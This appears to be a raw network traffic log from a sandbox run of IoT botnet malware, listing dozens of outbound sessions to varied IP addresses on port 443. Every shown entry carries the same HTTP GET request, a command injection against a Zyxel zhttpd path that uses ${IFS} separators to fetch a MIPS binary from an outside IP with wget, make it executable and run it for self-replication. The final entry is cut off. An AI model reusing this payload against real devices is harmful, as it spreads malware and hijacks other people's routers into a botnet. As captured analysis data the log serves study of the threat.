                                                Jan 28, 2024 10:16:29.884752035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5614192.168.2.2332956183.243.54.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884797096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5615192.168.2.2336096163.113.28.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884815931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5616192.168.2.234907894.174.164.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884829998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5617192.168.2.234797883.13.140.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884864092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5618192.168.2.234113081.34.241.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884891987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5619192.168.2.2338048121.182.211.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884937048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5620192.168.2.2357560114.160.97.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884963036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5621192.168.2.2338544182.232.76.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884979963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5622192.168.2.2347880201.56.6.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885010958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5623192.168.2.234823493.108.227.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885025978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5624192.168.2.2347764216.175.210.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885046005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5625192.168.2.2360472154.165.199.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885071993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5626192.168.2.235015866.85.57.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885082960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5627192.168.2.2342902133.227.253.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885123968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5628192.168.2.235585834.154.93.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885134935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5629192.168.2.235352086.4.230.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885176897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5630192.168.2.234248094.40.170.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885201931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5631192.168.2.2355222208.167.0.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885221004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5632192.168.2.2336614105.17.36.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885246038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5633192.168.2.2354082117.167.81.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885288000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5634192.168.2.234307878.225.173.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885322094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5635192.168.2.235074440.251.147.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885351896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5636192.168.2.2346626152.223.162.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885370970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5637192.168.2.233449885.87.194.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885390043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5638192.168.2.234753869.236.125.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885426044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5639192.168.2.233716675.10.80.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885449886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5640192.168.2.2340676221.191.241.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885464907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5641192.168.2.2334882195.166.215.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885523081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5642192.168.2.2357300198.170.39.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885541916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5643192.168.2.235704244.42.84.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885569096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5644192.168.2.2360226154.246.73.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885595083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5645192.168.2.2350780186.52.81.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885603905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5646192.168.2.233380659.160.108.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885621071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5647192.168.2.235194057.201.9.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885638952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5648192.168.2.2335510100.223.146.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885669947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5649192.168.2.2360054118.32.97.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885734081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5650192.168.2.233573490.40.161.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885737896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5651192.168.2.233700870.102.103.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885761976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5652192.168.2.2343092118.166.189.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885797977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5653192.168.2.2356344166.162.131.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885818005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5654192.168.2.2359540158.243.208.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885839939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5655192.168.2.2358028153.14.234.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885863066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5656192.168.2.234311070.54.238.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885873079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5657192.168.2.2359090100.53.109.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885901928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5658192.168.2.2354736183.123.186.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885926962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5659192.168.2.2353516196.100.234.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885978937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5660192.168.2.2359918159.230.58.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.885998011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5661192.168.2.2346180117.84.37.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.886008978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5662192.168.2.2335000173.67.28.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888811111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5663192.168.2.233494252.250.141.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888837099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5664192.168.2.234578831.132.56.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888864994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5665192.168.2.234964236.6.206.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888891935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5666192.168.2.235172012.189.23.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888942003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5667192.168.2.2339510108.57.26.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888971090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5668192.168.2.235198483.212.229.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.888986111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5669192.168.2.2333584155.82.243.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.889009953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5670192.168.2.2347702167.50.103.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.889028072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5671192.168.2.2337902163.156.210.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.889039993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5672192.168.2.2333458143.10.99.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.889059067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5673192.168.2.2354010178.232.1.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.889081001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5674192.168.2.236065082.2.235.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.889130116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5675192.168.2.2338220209.70.149.131443
                                                TimestampBytes transferredDirectionData
